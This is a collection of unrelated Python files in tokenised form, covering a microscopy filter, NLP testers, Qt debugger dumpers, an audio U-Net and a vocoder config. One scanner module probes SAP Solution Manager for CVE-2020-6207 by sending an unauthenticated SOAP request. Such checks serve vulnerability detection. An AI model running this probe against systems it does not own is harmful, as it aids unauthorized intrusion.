<import_stmt>warnings<import_from_stmt>typing Optional Union<import_from_stmt>starfish.core.morphology.binary_mask BinaryMaskCollection<import_from_stmt>starfish.core.types FunctionSource FunctionSourceBundle<import_from_stmt>._base FilterAlgorithm<class_stmt>Map(FilterAlgorithm)<block_start>"""
Map from input to output by applying a specified function to the input. The output must have
the same shape as the input.
Parameters
----------
func : Union[str, FunctionSourceBundle]
Function to apply across to each of the tiles in the input.
If this value is a string, then the ``module`` parameter is consulted to determine which
python package is used to find the function. If ``module`` is not specified, then the
default is :py:attr:`FunctionSource.np`.
If this value is a ``FunctionSourceBundle``, then the python package and module name is
obtained from the bundle.
module : Optional[FunctionSource]
Python module that serves as the source of the function. It must be listed as one of the
members of :py:class:`FunctionSource`.
Currently, the supported FunctionSources are:
- ``np``: the top-level package of numpy
- ``scipy``: the top-level package of scipy
This is being deprecated in favor of specifying the function as a ``FunctionSourceBundle``.
Examples
--------
Applying a binary opening function.
>>> from starfish.core.morphology.binary_mask.test import factories
>>> from starfish.morphology import Filter
>>> from starfish.types import FunctionSource
>>> from skimage.morphology import disk
>>> binary_mask_collection = factories.binary_mask_collection_2d()
>>> opener = Filter.Map(FunctionSource.scipy("morphology.binary_opening"), disk(4))
>>> opened = opener.run(binary_mask_collection)
"""<def_stmt>__init__ self func:Union[str FunctionSourceBundle] *func_args module:FunctionSource=FunctionSource.np **func_kwargs <arrow><none><block_start><if_stmt>isinstance(func str)<block_start><if_stmt>module<is><not><none><block_start>warnings.warn(f"The module parameter is being deprecated. Use "<concat>f"`func=FunctionSource.{module.name}{func} instead." DeprecationWarning)<block_end><else_stmt><block_start>module=FunctionSource.np<block_end>self._func=module(func)<block_end><elif_stmt>isinstance(func FunctionSourceBundle)<block_start><if_stmt>module<is><not><none><block_start><raise>ValueError("When passing in the function as a `FunctionSourceBundle`, module should not "<concat>"be set.")<block_end>self._func=func<block_end>self._func_args=func_args<line_sep>self._func_kwargs=func_kwargs<block_end><def_stmt>run self binary_mask_collection:BinaryMaskCollection n_processes:Optional[int]=<none> *args **kwargs<arrow>BinaryMaskCollection<block_start>"""Map from input to output by applying a specified function to the input.
Parameters
----------
binary_mask_collection : BinaryMaskCollection
BinaryMaskCollection to be filtered.
n_processes : Optional[int]
The number of processes to use for apply. If None, uses the output of os.cpu_count()
(default = None).
Returns
-------
BinaryMaskCollection
Return the results of filter as a new BinaryMaskCollection.
"""<line_sep># Apply the reducing function
<return>binary_mask_collection._apply(self._func.resolve() *self._func_args **self._func_kwargs)<block_end><block_end> |
<import_stmt>requests<line_sep># Vuln Base Info
<def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''SAP Solution Manager remote unauthorized OS commands execution''' "description":'''SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.''' "severity":"critical" "references":["https://launchpad.support.sap.com/#/notes/2890213" "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305" "https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf" "https://github.com/chipik/SAP_EEM_CVE-2020-6207" "https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/" "https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" "cvss-score":"" "cve-id":"CVE-2020-6207" "cwe-id":"CWE-306"} "metadata":{"vuln-target":"" } "tags":["cve" "cve2020" "sap" "solman" "rce"] }<block_end># Vender Fingerprint
<def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept
<def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/EemAdminService/EemAdmin"""<line_sep>method="POST"<line_sep>data="""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>"""<line_sep>headers={'SOAPAction':'""' 'Content-Type':'text/xml; charset=UTF-8' 'Connection':'close'}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>(""":Envelope"""<in>resp0.text<and>""":Body"""<in>resp0.text<and>""":getAllAgentInfoResponse"""<in>resp0.text)<and>(resp0.status_code<eq>200)<and>("""text/xml"""<in>str(resp0.headers)<and>"""SAP NetWeaver Application Server"""<in>str(resp0.headers))<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc()
<def_stmt>exp url<block_start><return>poc(url)<block_end># Utils
<def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end> |
<import_from_stmt>allennlp.common.testing ModelTestCase<import_from_stmt>qa.squad.rnet RNet<class_stmt>RNetDynamicTest(ModelTestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.set_up_model('tests/fixtures/rnet/experiment_dynamic.jsonnet' 'tests/fixtures/data/squad.json')<block_end><def_stmt>test_model_can_train_save_and_load self<block_start>self.ensure_model_can_train_save_and_load(self.param_file)<block_end><block_end> |
# coding: utf-8
<import_from_stmt>typing List Tuple Dict<import_stmt>torch<import_stmt>logging<import_stmt>sys<import_stmt>os<import_stmt>copy<import_stmt>json<import_stmt>collections<import_stmt>subprocess<import_from_stmt>tqdm tqdm trange<import_from_stmt>torch.utils.data TensorDataset DataLoader RandomSampler SequentialSampler<import_from_stmt>torch.utils.data.distributed DistributedSampler<line_sep># My Staff
<import_from_stmt>utils.iter_helper PadCollate FewShotDataset<import_from_stmt>utils.preprocessor FewShotFeature ModelInput<import_from_stmt>utils.device_helper prepare_model<import_from_stmt>utils.model_helper make_model load_model<import_from_stmt>models.modules.transition_scorer FewShotTransitionScorer<import_from_stmt>models.few_shot_seq_labeler FewShotSeqLabeler<line_sep>logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s' datefmt='%m/%d/%Y %H:%M:%S' level=logging.INFO stream=sys.stdout)<line_sep>logger=logging.getLogger(__name__)<line_sep>RawResult=collections.namedtuple("RawResult" ["feature" "prediction"])<class_stmt>TesterBase<block_start>"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""<def_stmt>__init__ self opt device n_gpu<block_start><if_stmt>opt.gradient_accumulation_steps<l>1<block_start><raise>ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(opt.gradient_accumulation_steps))<block_end>self.opt=opt<line_sep># Following is used to split the batch to save space
self.batch_size=opt.test_batch_size<line_sep>self.device=device<line_sep>self.n_gpu=n_gpu<block_end><def_stmt>do_test self model:torch.nn.Module test_features:List[FewShotFeature] id2label:dict log_mark:str='test_pred'<block_start>logger.info("***** Running eval *****")<line_sep># print("***** Running eval *****")
logger.info(" Num features = %d" len(test_features))<line_sep>logger.info(" Batch size = %d" self.batch_size)<line_sep>all_results=[]<line_sep>model.eval()<line_sep>data_loader=self.get_data_loader(test_features)<for_stmt>batch tqdm(data_loader desc="Eval-Batch Progress")<block_start>batch=tuple(t.to(self.device)<for>t batch)# multi-gpu does scattering it-self
<with_stmt>torch.no_grad()<block_start>predictions=self.do_forward(batch model)<block_end><for_stmt>i,feature_gid enumerate(batch[0])# iter over feature global id
<block_start>prediction=predictions[i]<line_sep>feature=test_features[feature_gid.item()]<line_sep>all_results.append(RawResult(feature=feature prediction=prediction))<if_stmt>model.emb_log<block_start>model.emb_log.write('text_'+str(feature_gid.item())+'\t'+'\t'.join(feature.test_feature_item.data_item.seq_in)+'\n')<block_end><block_end><block_end># close file handler
<if_stmt>model.emb_log<block_start>model.emb_log.close()<block_end>scores=self.eval_predictions(all_results id2label log_mark)<line_sep><return>scores<block_end><def_stmt>get_data_loader self features<block_start>dataset=TensorDataset([self.unpack_feature(f)<for>f features])<if_stmt>self.opt.local_rank<eq>-1<block_start>sampler=RandomSampler(dataset)<block_end><else_stmt><block_start>sampler=DistributedSampler(dataset)<block_end>data_loader=DataLoader(dataset sampler=sampler batch_size=self.batch_size)<line_sep><return>data_loader<block_end><def_stmt>clone_model self model id2label# get a new instance
<block_start><return>copy.deepcopy(model)<block_end><def_stmt>unpack_feature self feature<arrow>List[torch.Tensor]<block_start><raise>NotImplementedError<block_end><def_stmt>do_forward self batch model<block_start>prediction=model(*batch)<line_sep><return>prediction<block_end><def_stmt>eval_predictions self *args **kwargs<arrow>float<block_start><raise>NotImplementedError<block_end><block_end><class_stmt>FewShotTester(TesterBase)<block_start>"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""<def_stmt>__init__ self opt device n_gpu<block_start>super(FewShotTester self).__init__(opt device n_gpu)<block_end><def_stmt>get_data_loader self features<block_start>dataset=FewShotDataset([self.unpack_feature(f)<for>f features])<if_stmt>self.opt.local_rank<eq>-1<block_start>sampler=SequentialSampler(dataset)<block_end><else_stmt><block_start>sampler=DistributedSampler(dataset)<block_end>pad_collate=PadCollate(dim=-1 sp_dim=-2 sp_item_idx=[3 8 12])# nwp_index, spt_tgt need special padding
data_loader=DataLoader(dataset sampler=sampler batch_size=self.batch_size collate_fn=pad_collate)<line_sep><return>data_loader<block_end><def_stmt>eval_predictions self all_results:List[RawResult] id2label:dict log_mark:str<arrow>float<block_start>""" Our result score is average score of all few-shot batches. """<line_sep>all_batches=self.reform_few_shot_batch(all_results)<line_sep>all_scores=[]<for_stmt>b_id,fs_batch all_batches<block_start>f1=self.eval_one_few_shot_batch(b_id fs_batch id2label log_mark)<line_sep>all_scores.append(f1)<block_end><return>sum(all_scores)<times>1.0/len(all_scores)<block_end><def_stmt>eval_one_few_shot_batch self b_id fs_batch:List[RawResult] id2label:dict log_mark:str<arrow>float<block_start>pred_file_name='{}.{}.txt'.format(log_mark b_id)<line_sep>output_prediction_file=os.path.join(self.opt.output_dir pred_file_name)<if_stmt>self.opt.task<eq>'sl'<block_start>self.writing_sl_prediction(fs_batch output_prediction_file id2label)<line_sep>precision,recall,f1=self.eval_with_script(output_prediction_file)<block_end><elif_stmt>self.opt.task<eq>'sc'<block_start>precision,recall,f1=self.writing_sc_prediction(fs_batch output_prediction_file id2label)<block_end><else_stmt><block_start><raise>ValueError("Wrong task.")<block_end><return>f1<block_end><def_stmt>writing_sc_prediction self fs_batch:List[RawResult] output_prediction_file:str id2label:dict<block_start>tp,fp,fn=0 0 0<line_sep>writing_content=[]<for_stmt>result fs_batch<block_start>pred_ids=result.prediction# prediction is directly the predict ids [pad is removed in decoder]
feature=result.feature<line_sep>pred_label=set([id2label[pred_id]<for>pred_id pred_ids])<line_sep>label=set(feature.test_feature_item.data_item.label)<line_sep>writing_content.append({'seq_in':feature.test_feature_item.data_item.seq_in 'pred':list(pred_label) 'label':list(label) })<line_sep>tp,fp,fn=self.update_f1_frag(pred_label label tp fp fn)<block_end># update tp, fp, fn
<with_stmt>open(output_prediction_file "w")<as>writer<block_start>json.dump(writing_content writer indent=2)<block_end><return>self.compute_f1(tp fp fn)<block_end><def_stmt>update_f1_frag self pred_label label tp=0 fp=0 fn=0<block_start>tp<augadd>len(pred_label&label)<line_sep>fp<augadd>len(pred_label-label)<line_sep>fn<augadd>len(label-pred_label)<line_sep><return>tp fp fn<block_end><def_stmt>compute_f1 self tp fp fn<block_start>tp<augadd>0.0000001# to avoid zero division
fp<augadd>0.0000001<line_sep>fn<augadd>0.0000001<line_sep>precision=1.0<times>tp/(tp+fp)<line_sep>recall=1.0<times>tp/(tp+fn)<line_sep>f1=2<times>precision<times>recall/(precision+recall)<line_sep><return>precision recall f1<block_end><def_stmt>writing_sl_prediction self fs_batch:List[RawResult] output_prediction_file:str id2label:dict<block_start>writing_content=[]<for_stmt>result fs_batch<block_start>prediction=result.prediction<line_sep>feature=result.feature<line_sep>pred_ids=prediction# prediction is directly the predict ids
<if_stmt>len(pred_ids)<ne>len(feature.test_feature_item.data_item.seq_in)<block_start><raise>RuntimeError("Failed to align the pred_ids to texts: {},{} \n{},{} \n{},{}".format(len(pred_ids) pred_ids len(feature.test_feature_item.data_item.seq_in) feature.test_feature_item.data_item.seq_in len(feature.test_feature_item.data_item.seq_out) feature.test_feature_item.data_item.seq_out))<block_end><for_stmt>pred_id,word,true_label zip(pred_ids feature.test_feature_item.data_item.seq_in feature.test_feature_item.data_item.seq_out)<block_start>pred_label=id2label[pred_id]<line_sep>writing_content.append('{0} {1} {2}'.format(word true_label pred_label))<block_end>writing_content.append('')<block_end><with_stmt>open(output_prediction_file "w")<as>writer<block_start>writer.write('\n'.join(writing_content))<block_end><block_end><def_stmt>eval_with_script self output_prediction_file<block_start>script_args=['perl' self.opt.eval_script]<with_stmt>open(output_prediction_file 'r')<as>res_file<block_start>p=subprocess.Popen(script_args stdout=subprocess.PIPE stdin=res_file)<line_sep>p.wait()<line_sep>std_results=p.stdout.readlines()<if_stmt>self.opt.verbose<block_start><for_stmt>r std_results<block_start>print(r)<block_end><block_end>std_results=str(std_results[1]).split()<block_end>precision=float(std_results[3].replace('%;' ''))<line_sep>recall=float(std_results[5].replace('%;' ''))<line_sep>f1=float(std_results[7].replace('%;' '').replace("\\n'" ''))<line_sep><return>precision recall f1<block_end><def_stmt>reform_few_shot_batch self all_results:List[RawResult]<arrow>List[List[Tuple[int RawResult]]]<block_start>"""
Our result score is average score of all few-shot batches.
So here, we classify all result according to few-shot batch id.
"""<line_sep>all_batches={}<for_stmt>result all_results<block_start>b_id=result.feature.batch_gid<if_stmt>b_id<not><in>all_batches<block_start>all_batches[b_id]=[result]<block_end><else_stmt><block_start>all_batches[b_id].append(result)<block_end><block_end><return>sorted(all_batches.items() key=<lambda>x:x[0])<block_end><def_stmt>unpack_feature self feature:FewShotFeature<arrow>List[torch.Tensor]<block_start>ret=[torch.LongTensor([feature.gid]) # test
feature.test_input.token_ids feature.test_input.segment_ids feature.test_input.nwp_index feature.test_input.input_mask feature.test_input.output_mask # support
feature.support_input.token_ids feature.support_input.segment_ids feature.support_input.nwp_index feature.support_input.input_mask feature.support_input.output_mask # target
feature.test_target feature.support_target # Special
torch.LongTensor([len(feature.support_feature_items)]) # support num
]<line_sep><return>ret<block_end><def_stmt>do_forward self batch model<block_start>(gid # 0
test_token_ids # 1
test_segment_ids # 2
test_nwp_index # 3
test_input_mask # 4
test_output_mask # 5
support_token_ids # 6
support_segment_ids # 7
support_nwp_index # 8
support_input_mask # 9
support_output_mask # 10
test_target # 11
support_target # 12
support_num # 13
)=batch<line_sep>prediction=model(# loss, prediction = model(
test_token_ids test_segment_ids test_nwp_index test_input_mask test_output_mask support_token_ids support_segment_ids support_nwp_index support_input_mask support_output_mask test_target support_target support_num )<line_sep><return>prediction<block_end><def_stmt>get_value_from_order_dict self order_dict key<block_start>""""""<for_stmt>k,v order_dict.items()<block_start><if_stmt>key<in>k<block_start><return>v<block_end><block_end><return>[]<block_end><def_stmt>clone_model self model id2label<block_start>""" clone only part of params """<line_sep># deal with data parallel model
new_model:FewShotSeqLabeler<line_sep>old_model:FewShotSeqLabeler<if_stmt>self.opt.local_rank<ne>-1<or>self.n_gpu<g>1<and>hasattr(model 'module')# the model is parallel class here
<block_start>old_model=model.module<block_end><else_stmt><block_start>old_model=model<block_end>emission_dict=old_model.emission_scorer.state_dict()<line_sep>old_num_tags=len(self.get_value_from_order_dict(emission_dict 'label_reps'))<line_sep>config={'num_tags':len(id2label) 'id2label':id2label}<if_stmt>'num_anchors'<in>old_model.config<block_start>config['num_anchors']=old_model.config['num_anchors']# Use previous model's random anchors.
<block_end># get a new instance for different domain
new_model=make_model(opt=self.opt config=config)<line_sep>new_model=prepare_model(self.opt new_model self.device self.n_gpu)<if_stmt>self.opt.local_rank<ne>-1<or>self.n_gpu<g>1<block_start>sub_new_model=new_model.module<block_end><else_stmt><block_start>sub_new_model=new_model<block_end>''' copy weights and stuff '''<if_stmt>old_model.opt.task<eq>'sl'<and>old_model.transition_scorer# copy one-by-one because target transition and decoder will be left un-assigned
<block_start>sub_new_model.context_embedder.load_state_dict(old_model.context_embedder.state_dict())<line_sep>sub_new_model.emission_scorer.load_state_dict(old_model.emission_scorer.state_dict())<for_stmt>param_name ['backoff_trans_mat' 'backoff_start_trans_mat' 'backoff_end_trans_mat']<block_start>sub_new_model.transition_scorer.state_dict()[param_name].copy_(old_model.transition_scorer.state_dict()[param_name].data)<block_end><block_end><else_stmt><block_start>sub_new_model.load_state_dict(old_model.state_dict())<block_end><return>new_model<block_end><block_end><class_stmt>SchemaFewShotTester(FewShotTester)<block_start><def_stmt>__init__ self opt device n_gpu<block_start>super(SchemaFewShotTester self).__init__(opt device n_gpu)<block_end><def_stmt>get_data_loader self features<block_start>""" add label index into special padding """<line_sep>dataset=FewShotDataset([self.unpack_feature(f)<for>f features])<if_stmt>self.opt.local_rank<eq>-1<block_start>sampler=SequentialSampler(dataset)<block_end><else_stmt><block_start>sampler=DistributedSampler(dataset)<block_end>pad_collate=PadCollate(dim=-1 sp_dim=-2 sp_item_idx=[3 8 12 16])# nwp_index, spt_tgt need sp-padding
data_loader=DataLoader(dataset sampler=sampler batch_size=self.batch_size collate_fn=pad_collate)<line_sep><return>data_loader<block_end><def_stmt>unpack_feature self feature:FewShotFeature<arrow>List[torch.Tensor]<block_start>ret=[torch.LongTensor([feature.gid]) # test
feature.test_input.token_ids feature.test_input.segment_ids feature.test_input.nwp_index feature.test_input.input_mask feature.test_input.output_mask # support
feature.support_input.token_ids feature.support_input.segment_ids feature.support_input.nwp_index feature.support_input.input_mask feature.support_input.output_mask # target
feature.test_target feature.support_target # Special
torch.LongTensor([len(feature.support_feature_items)]) # support num
# label feature
feature.label_input.token_ids feature.label_input.segment_ids feature.label_input.nwp_index feature.label_input.input_mask feature.label_input.output_mask ]<line_sep><return>ret<block_end><def_stmt>do_forward self batch model<block_start>(gid # 0
test_token_ids # 1
test_segment_ids # 2
test_nwp_index # 3
test_input_mask # 4
test_output_mask # 5
support_token_ids # 6
support_segment_ids # 7
support_nwp_index # 8
support_input_mask # 9
support_output_mask # 10
test_target # 11
support_target # 12
support_num # 13
# label feature
label_token_ids # 14
label_segment_ids # 15
label_nwp_index # 16
label_input_mask # 17
label_output_mask # 18
)=batch<line_sep>prediction=model(test_token_ids test_segment_ids test_nwp_index test_input_mask test_output_mask support_token_ids support_segment_ids support_nwp_index support_input_mask support_output_mask test_target support_target support_num # label feature
label_token_ids label_segment_ids label_nwp_index label_input_mask label_output_mask )<line_sep><return>prediction<block_end><block_end><def_stmt>eval_check_points opt tester test_features test_id2label device<block_start>all_cpt_file=list(filter(<lambda>x:'.cpt.pl'<in>x os.listdir(opt.saved_model_path)))<line_sep>all_cpt_file=sorted(all_cpt_file key=<lambda>x:int(x.replace('model.step' '').replace('.cpt.pl' '')))<line_sep>max_score=0<for_stmt>cpt_file all_cpt_file<block_start>cpt_model=load_model(os.path.join(opt.saved_model_path cpt_file))<line_sep>testing_model=tester.clone_model(cpt_model test_id2label)<if_stmt>opt.mask_transition<and>opt.task<eq>'sl'<block_start>testing_model.label_mask=opt.test_label_mask.to(device)<block_end>test_score=tester.do_test(testing_model test_features test_id2label log_mark='test_pred')<if_stmt>test_score<g>max_score<block_start>max_score=test_score<block_end>logger.info('cpt_file:{} - test:{}'.format(cpt_file test_score))<block_end><return>max_score<block_end> |
<import_from_stmt>enum Enum<import_from_stmt>stories story<line_sep># Base classes.
<class_stmt>ChildWithNull<block_start>@story<def_stmt>x I<block_start>I.one<block_end><block_end><class_stmt>NextChildWithNull<block_start>@story<def_stmt>y I<block_start>I.two<block_end><block_end><class_stmt>ParentWithNull<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end><class_stmt>SequenceParentWithNull<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.y<line_sep>I.after<block_end><block_end><class_stmt>ChildWithList<block_start>@story<def_stmt>x I<block_start>I.one<block_end><block_end>ChildWithList.x.failures(["foo" "bar" "baz"])<class_stmt>NextChildWithList<block_start>@story<def_stmt>y I<block_start>I.two<block_end><block_end>NextChildWithList.y.failures(["spam" "ham" "eggs"])<class_stmt>ParentWithList<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>ParentWithList.a.failures(["foo" "bar" "baz"])<class_stmt>WideParentWithList<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>WideParentWithList.a.failures(["foo" "bar" "baz" "quiz"])<class_stmt>ShrinkParentWithList<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>ShrinkParentWithList.a.failures(["foo" "quiz"])<class_stmt>ChildWithEnum<block_start>@story<def_stmt>x I<block_start>I.one<block_end>@x.failures<class_stmt>Errors(Enum)<block_start>foo=1<line_sep>bar=2<line_sep>baz=3<block_end><block_end><class_stmt>NextChildWithEnum<block_start>@story<def_stmt>y I<block_start>I.two<block_end>@y.failures<class_stmt>Errors(Enum)<block_start>spam=1<line_sep>ham=2<line_sep>eggs=3<block_end><block_end><class_stmt>ParentWithEnum<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>@ParentWithEnum.a.failures<class_stmt>Errors(Enum)<block_start>foo=1<line_sep>bar=2<line_sep>baz=3<block_end><class_stmt>WideParentWithEnum<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>@WideParentWithEnum.a.failures<class_stmt>Errors(Enum)# noqa: F811
<block_start>foo=1<line_sep>bar=2<line_sep>baz=3<line_sep>quiz=4<block_end><class_stmt>ShrinkParentWithEnum<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>@ShrinkParentWithEnum.a.failures<class_stmt>Errors(Enum)# noqa: F811
<block_start>foo=1<line_sep>quiz=4<block_end> |
# Check http://doc.qt.io/qtcreator/creator-debugging-helpers.html
# for more details or look at qttypes.py, stdtypes.py, boosttypes.py
# for more complex examples.
<import_from_stmt>dumper Children SubItem UnnamedSubItem DumperBase<import_from_stmt>utils DisplayFormat TypeCode<import_from_stmt>qttypes *<import_stmt>struct<line_sep>####################### Your code below #######################
### Part 1
<def_stmt>qdump__Foo d value<block_start>i=value["i"].integer()<line_sep>j=value["j"].integer()<line_sep>d.putValue("[%d,%d]"%(i j))<line_sep>d.putExpandable()<if_stmt>d.isExpanded()<block_start><with_stmt>Children(d)<block_start>d.putSubItem('j' value["j"])<line_sep># Don't try this at home :-)
# and the "i" (that is the one in quotes stand for type integer...
d.putSubItem('i' d.createValue(struct.pack("i" i) d.intType()))<with_stmt>SubItem(d "sum")<block_start>d.putValue(i+j)<line_sep>d.putType(d.intType())<block_end><block_end><block_end><block_end># not really needed though
### Part 2
<def_stmt>qdump__MyNameSpace__Foo d value<block_start>d.putValue("Secret!")<line_sep>d.putPlainChildren(value)<block_end>### Part 3
#def qdump__Money(d, value):
# amount = value["m_amount"].floatingPoint()
# currency = value["m_currency"].integer()
# d.putValue("%s %s" % (("EUR" if (currency == 0) else "USD"), amount))
# d.putPlainChildren(value)
### Part 4
<def_stmt>qdump__Money d value<block_start>str=d.call("@QString" value "toString")<line_sep>d.putStringValue(str)<line_sep>d.putPlainChildren(value)<block_end>### Part 5
<def_stmt>qdump__FooOrBar d value<block_start>str=d.parseAndEvaluate("fooOrBarToString(*((FooOrBar*)%s))"%value.laddress)<line_sep>d.putStringValue(str)<line_sep>d.putPlainChildren(value)<block_end>#### Part 6
<def_stmt>qdump__UserID d value<block_start>employeeID=value.integer()<line_sep>str=d.parseAndEvaluate("EmployeeDatabase::instance().lookup(%d)"%employeeID)<line_sep>d.putStringValue(str)<block_end><def_stmt>qdump__UserIDList d value<block_start>d.createTypedefedType(d.lookupType("int") "UserID")<line_sep>d.formats[d.currentIName]=DisplayFormat.DirectQListStorage<line_sep>d.putItem(value.cast("QList<UserID>"))<block_end> |
<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.keras.layers BatchNormalization LeakyReLU Activation Conv1D ELU Add <import_from_stmt>functools partial<import_from_stmt>tensorflow.compat.v1.keras.initializers he_uniform<def_stmt>_get_conv_activation_layer params<block_start>"""
:param params:
:returns: Required Activation function.
"""<line_sep>conv_activation=params.get('conv_activation')<if_stmt>conv_activation<eq>'ReLU'<block_start><return>ReLU()<block_end><elif_stmt>conv_activation<eq>'ELU'<block_start><return>ELU()<block_end><return>LeakyReLU(0.2)<block_end><class_stmt>UpSamplingLayer<block_start><def_stmt>__init__ self channel_out kernel_size=5 stride=1<block_start>self.seq=tf.keras.Sequential()<line_sep>self.seq.add(tf.keras.layers.Conv1D(channel_out kernel_size=kernel_size strides=stride padding='SAME' dilation_rate=1 ))<line_sep>self.seq.add(BatchNormalization(axis=-1))<line_sep>self.seq.add(LeakyReLU(0.2))<block_end><def_stmt>__call__ self x training=<true><block_start><return>self.seq(x training=training)<block_end><block_end><class_stmt>Model<block_start><def_stmt>__init__ self inputs training=<true> ksize=5 n_layers=12 channels_interval=24 logging=<true> <block_start>conv_activation_layer=_get_conv_activation_layer({})<line_sep>kernel_initializer=he_uniform(seed=50)<line_sep>conv1d_factory=partial(Conv1D strides=(2) padding='same' kernel_initializer=kernel_initializer )<def_stmt>resnet_block input_tensor filter_size<block_start>res=conv1d_factory(filter_size (1) strides=(1) use_bias=<false>)(input_tensor)<line_sep>conv1=conv1d_factory(filter_size (5) strides=(1))(input_tensor)<line_sep>batch1=BatchNormalization(axis=-1)(conv1 training=training)<line_sep>rel1=conv_activation_layer(batch1)<line_sep>conv2=conv1d_factory(filter_size (5) strides=(1))(rel1)<line_sep>batch2=BatchNormalization(axis=-1)(conv2 training=training)<line_sep>resconnection=Add()([res batch2])<line_sep>rel2=conv_activation_layer(resconnection)<line_sep><return>rel2<block_end>self.n_layers=n_layers<line_sep>self.channels_interval=channels_interval<line_sep>out_channels=[i<times>self.channels_interval<for>i range(1 self.n_layers+1)]<line_sep>self.middle=tf.keras.Sequential()<line_sep>self.middle.add(tf.keras.layers.Conv1D(self.n_layers<times>self.channels_interval kernel_size=15 strides=1 padding='SAME' dilation_rate=1 ))<line_sep>self.middle.add(BatchNormalization(axis=-1))<line_sep>self.middle.add(LeakyReLU(0.2))<line_sep>decoder_out_channels_list=out_channels[::-1]<line_sep>self.decoder=[]<for_stmt>i range(self.n_layers)<block_start>self.decoder.append(UpSamplingLayer(channel_out=decoder_out_channels_list[i]))<block_end>self.out=tf.keras.Sequential()<line_sep>self.out.add(tf.keras.layers.Conv1D(1 kernel_size=1 strides=1 padding='SAME' dilation_rate=1 ))<line_sep>self.out.add(Activation('tanh'))<line_sep>tmp=[]<line_sep>o=inputs<for_stmt>i range(self.n_layers)<block_start>o=resnet_block(o out_channels[i])<line_sep>tmp.append(o)<line_sep>o=o[: ::2]<if_stmt>logging<block_start>print(o)<block_end><block_end>o=self.middle(o training=training)<if_stmt>logging<block_start>print(o)<block_end><for_stmt>i range(self.n_layers)<block_start>o=tf.image.resize(o [tf.shape(o)[0] tf.shape(o)[1]<times>2] method='nearest')<line_sep>o=tf.concat([o tmp[self.n_layers-i-1]] axis=2)<line_sep>o=self.decoder[i](o training=training)<if_stmt>logging<block_start>print(o)<block_end><block_end><if_stmt>logging<block_start>print(o inputs)<block_end>o=tf.concat([o inputs] axis=2)<line_sep>o=self.out(o training=training)<line_sep>self.logits=o<block_end><block_end> |
<import_stmt>torch<import_stmt>numpy<as>np<import_stmt>os<import_from_stmt>voicefixer.tools.path root_path<class_stmt>Config<block_start>@classmethod<def_stmt>refresh cls sr<block_start><if_stmt>sr<eq>44100<block_start>Config.ckpt=os.path.join(os.path.expanduser("~") ".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt" )<line_sep>Config.cond_channels=512<line_sep>Config.m_channels=768<line_sep>Config.resstack_depth=[8 8 8 8]<line_sep>Config.channels=1024<line_sep>Config.cin_channels=128<line_sep>Config.upsample_scales=[7 7 3 3]<line_sep>Config.num_mels=128<line_sep>Config.n_fft=2048<line_sep>Config.hop_length=441<line_sep>Config.sample_rate=44100<line_sep>Config.fmax=22000<line_sep>Config.mel_win=128<line_sep>Config.local_condition_dim=128<block_end><else_stmt><block_start><raise>RuntimeError("Error: Vocoder currently only support 44100 samplerate.")<block_end><block_end>ckpt=os.path.join(os.path.expanduser("~") ".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt" )<line_sep>m_channels=384<line_sep>bits=10<line_sep>opt="Ralamb"<line_sep>cond_channels=256<line_sep>clip=0.5<line_sep>num_bands=1<line_sep>cin_channels=128<line_sep>upsample_scales=[7 7 3 3]<line_sep>filterbands="test/filterbanks_4bands.dat"<line_sep>##For inference
